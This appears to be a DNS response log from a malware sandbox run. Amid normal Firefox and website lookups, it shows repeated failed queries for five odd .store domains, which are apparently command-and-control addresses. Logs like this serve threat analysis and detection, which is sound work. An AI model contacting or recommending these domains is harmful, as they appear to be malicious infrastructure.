Nov 4, 2024 17:33:04.215558052 CET	1.1.1.1	192.168.2.5	0xe8e	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:04.215780020 CET	1.1.1.1	192.168.2.5	0xb6ed	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 4, 2024 17:33:04.215970993 CET	1.1.1.1	192.168.2.5	0x2bfa	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 4, 2024 17:33:04.258766890 CET	1.1.1.1	192.168.2.5	0x8527	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 4, 2024 17:33:04.258801937 CET	1.1.1.1	192.168.2.5	0xd759	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:04.258801937 CET	1.1.1.1	192.168.2.5	0xd759	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.060976028 CET	1.1.1.1	192.168.2.5	0x2656	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.098146915 CET	1.1.1.1	192.168.2.5	0x7454	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.127018929 CET	1.1.1.1	192.168.2.5	0x3502	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.155430079 CET	1.1.1.1	192.168.2.5	0xba17	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:07.180830956 CET	1.1.1.1	192.168.2.5	0xe03a	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.452797890 CET	1.1.1.1	192.168.2.5	0x91a8	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.535803080 CET	1.1.1.1	192.168.2.5	0x3ed9	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.633327961 CET	1.1.1.1	192.168.2.5	0xd08f	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.682645082 CET	1.1.1.1	192.168.2.5	0xa13	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:31.753568888 CET	1.1.1.1	192.168.2.5	0x2715	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.772444963 CET	1.1.1.1	192.168.2.5	0x3b2c	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.774063110 CET	1.1.1.1	192.168.2.5	0xe295	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:31.774063110 CET	1.1.1.1	192.168.2.5	0xe295	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.836967945 CET	1.1.1.1	192.168.2.5	0xe6c2	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.844388962 CET	1.1.1.1	192.168.2.5	0x1289	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:31.844388962 CET	1.1.1.1	192.168.2.5	0x1289	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.847789049 CET	1.1.1.1	192.168.2.5	0x37c7	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:31.856153011 CET	1.1.1.1	192.168.2.5	0x31f2	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:32.062846899 CET	1.1.1.1	192.168.2.5	0xaed4	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:32.062846899 CET	1.1.1.1	192.168.2.5	0xaed4	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:32.478709936 CET	1.1.1.1	192.168.2.5	0xf022	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987015009 CET	1.1.1.1	192.168.2.5	0x33fc	No error (0)	youtube-ui.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987212896 CET	1.1.1.1	192.168.2.5	0x4a32	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987212896 CET	1.1.1.1	192.168.2.5	0x4a32	No error (0)	dyna.wikimedia.org		185.15.59.224	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987373114 CET	1.1.1.1	192.168.2.5	0x637b	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:34.987373114 CET	1.1.1.1	192.168.2.5	0x637b	No error (0)	star-mini.c10r.facebook.com		157.240.253.35	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.998462915 CET	1.1.1.1	192.168.2.5	0xae8d	No error (0)	youtube-ui.l.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:34.999432087 CET	1.1.1.1	192.168.2.5	0x60de	No error (0)	dyna.wikimedia.org		185.15.59.224	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.000539064 CET	1.1.1.1	192.168.2.5	0xa295	No error (0)	star-mini.c10r.facebook.com		157.240.0.35	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.014823914 CET	1.1.1.1	192.168.2.5	0x509c	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Nov 4, 2024 17:33:35.015887022 CET	1.1.1.1	192.168.2.5	0x8ebc	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Nov 4, 2024 17:33:35.016540051 CET	1.1.1.1	192.168.2.5	0xae94	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 4, 2024 17:33:35.016540051 CET	1.1.1.1	192.168.2.5	0xae94	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 4, 2024 17:33:35.016540051 CET	1.1.1.1	192.168.2.5	0xae94	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 4, 2024 17:33:35.016540051 CET	1.1.1.1	192.168.2.5	0xae94	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 4, 2024 17:33:35.072657108 CET	1.1.1.1	192.168.2.5	0x7692	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:35.072657108 CET	1.1.1.1	192.168.2.5	0x7692	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.072657108 CET	1.1.1.1	192.168.2.5	0x7692	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.072657108 CET	1.1.1.1	192.168.2.5	0x7692	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.072657108 CET	1.1.1.1	192.168.2.5	0x7692	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.073018074 CET	1.1.1.1	192.168.2.5	0x3fb7	No error (0)	twitter.com		104.244.42.65	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.091905117 CET	1.1.1.1	192.168.2.5	0xe057	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.092911005 CET	1.1.1.1	192.168.2.5	0x524b	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.092911005 CET	1.1.1.1	192.168.2.5	0x524b	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.092911005 CET	1.1.1.1	192.168.2.5	0x524b	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.092911005 CET	1.1.1.1	192.168.2.5	0x524b	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.259145021 CET	1.1.1.1	192.168.2.5	0x591a	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:35.259145021 CET	1.1.1.1	192.168.2.5	0x591a	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:35.259145021 CET	1.1.1.1	192.168.2.5	0x591a	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.270245075 CET	1.1.1.1	192.168.2.5	0xdbe4	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:48.968843937 CET	1.1.1.1	192.168.2.5	0x74d9	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:48.968843937 CET	1.1.1.1	192.168.2.5	0x74d9	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.254520893 CET	1.1.1.1	192.168.2.5	0x92bf	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:34:00.254520893 CET	1.1.1.1	192.168.2.5	0x92bf	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.255305052 CET	1.1.1.1	192.168.2.5	0x211c	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.262068987 CET	1.1.1.1	192.168.2.5	0x15d6	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.262068987 CET	1.1.1.1	192.168.2.5	0x15d6	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.262068987 CET	1.1.1.1	192.168.2.5	0x15d6	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.262068987 CET	1.1.1.1	192.168.2.5	0x15d6	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.276518106 CET	1.1.1.1	192.168.2.5	0x4ce	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.276518106 CET	1.1.1.1	192.168.2.5	0x4ce	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.276518106 CET	1.1.1.1	192.168.2.5	0x4ce	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.276518106 CET	1.1.1.1	192.168.2.5	0x4ce	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.283965111 CET	1.1.1.1	192.168.2.5	0x9fde	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Nov 4, 2024 17:34:00.283965111 CET	1.1.1.1	192.168.2.5	0x9fde	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Nov 4, 2024 17:34:00.283965111 CET	1.1.1.1	192.168.2.5	0x9fde	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Nov 4, 2024 17:34:00.283965111 CET	1.1.1.1	192.168.2.5	0x9fde	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Nov 4, 2024 17:34:00.306413889 CET	1.1.1.1	192.168.2.5	0x5d8f	No error (0)	normandy.cdn.mozilla.net	normandy-cdn.services.mozilla.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:34:00.306413889 CET	1.1.1.1	192.168.2.5	0x5d8f	No error (0)	normandy-cdn.services.mozilla.com		35.201.103.21	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.317511082 CET	1.1.1.1	192.168.2.5	0xb571	No error (0)	normandy-cdn.services.mozilla.com		35.201.103.21	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:01.598323107 CET	1.1.1.1	192.168.2.5	0x5d75	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:34:01.598323107 CET	1.1.1.1	192.168.2.5	0x5d75	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:34:09.828052044 CET	1.1.1.1	192.168.2.5	0x2662	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:23.757976055 CET	1.1.1.1	192.168.2.5	0x416d	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:31.014597893 CET	1.1.1.1	192.168.2.5	0xee12	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:31.675712109 CET	1.1.1.1	192.168.2.5	0x4fd	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:34:31.675712109 CET	1.1.1.1	192.168.2.5	0x4fd	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:11.455876112 CET	1.1.1.1	192.168.2.5	0xf7f7	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:11.467758894 CET	1.1.1.1	192.168.2.5	0x7a21	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:12.093162060 CET	1.1.1.1	192.168.2.5	0x6fc8	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:36:12.093162060 CET	1.1.1.1	192.168.2.5	0x6fc8	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.150923967 CET	1.1.1.1	192.168.2.5	0x2290	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.179176092 CET	1.1.1.1	192.168.2.5	0xa6d7	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.205230951 CET	1.1.1.1	192.168.2.5	0x9384	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.230952978 CET	1.1.1.1	192.168.2.5	0xe333	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.256352901 CET	1.1.1.1	192.168.2.5	0x1424	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.791770935 CET	1.1.1.1	192.168.2.5	0xb2de	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.818336964 CET	1.1.1.1	192.168.2.5	0x1899	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.820132017 CET	1.1.1.1	192.168.2.5	0x1899	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.844172001 CET	1.1.1.1	192.168.2.5	0xa7c5	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.869695902 CET	1.1.1.1	192.168.2.5	0x8c60	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.895770073 CET	1.1.1.1	192.168.2.5	0x5e49	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.898406029 CET	1.1.1.1	192.168.2.5	0x5e49	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.057079077 CET	1.1.1.1	192.168.2.5	0xb873	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.197336912 CET	1.1.1.1	192.168.2.5	0x3ce8	No error (0)	youtube.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.250204086 CET	1.1.1.1	192.168.2.5	0x6683	No error (0)	youtube.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.254657984 CET	1.1.1.1	192.168.2.5	0xb5d7	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:36:40.254657984 CET	1.1.1.1	192.168.2.5	0xb5d7	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.267299891 CET	1.1.1.1	192.168.2.5	0xe447	No error (0)	youtube.com			28	IN (0x0001)	false
Nov 4, 2024 17:36:40.269867897 CET	1.1.1.1	192.168.2.5	0x2a91	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.274796963 CET	1.1.1.1	192.168.2.5	0xd370	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:36:40.274796963 CET	1.1.1.1	192.168.2.5	0xd370	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.294094086 CET	1.1.1.1	192.168.2.5	0xe99f	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.313775063 CET	1.1.1.1	192.168.2.5	0x709c	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:36:40.313775063 CET	1.1.1.1	192.168.2.5	0x709c	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:36:40.313775063 CET	1.1.1.1	192.168.2.5	0x709c	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.409049988 CET	1.1.1.1	192.168.2.5	0xb47c	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:36:40.482247114 CET	1.1.1.1	192.168.2.5	0x5a28	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.482456923 CET	1.1.1.1	192.168.2.5	0xaafb	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:36:40.482456923 CET	1.1.1.1	192.168.2.5	0xaafb	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.482848883 CET	1.1.1.1	192.168.2.5	0x469f	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:41.019552946 CET	1.1.1.1	192.168.2.5	0xd360	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:41.019562960 CET	1.1.1.1	192.168.2.5	0xd360	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:41.031706095 CET	1.1.1.1	192.168.2.5	0x7012	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:36:41.031706095 CET	1.1.1.1	192.168.2.5	0x7012	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:41.191514969 CET	1.1.1.1	192.168.2.5	0x96f	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.308645964 CET	1.1.1.1	192.168.2.5	0x61a8	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.312633991 CET	1.1.1.1	192.168.2.5	0x61a8	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.349059105 CET	1.1.1.1	192.168.2.5	0xdf61	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.359930992 CET	1.1.1.1	192.168.2.5	0xdf61	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.386514902 CET	1.1.1.1	192.168.2.5	0x7c4f	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.391762972 CET	1.1.1.1	192.168.2.5	0x7c4f	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.422456980 CET	1.1.1.1	192.168.2.5	0xb4d7	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.438076019 CET	1.1.1.1	192.168.2.5	0xb4d7	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.463643074 CET	1.1.1.1	192.168.2.5	0x43fe	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.470673084 CET	1.1.1.1	192.168.2.5	0x43fe	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
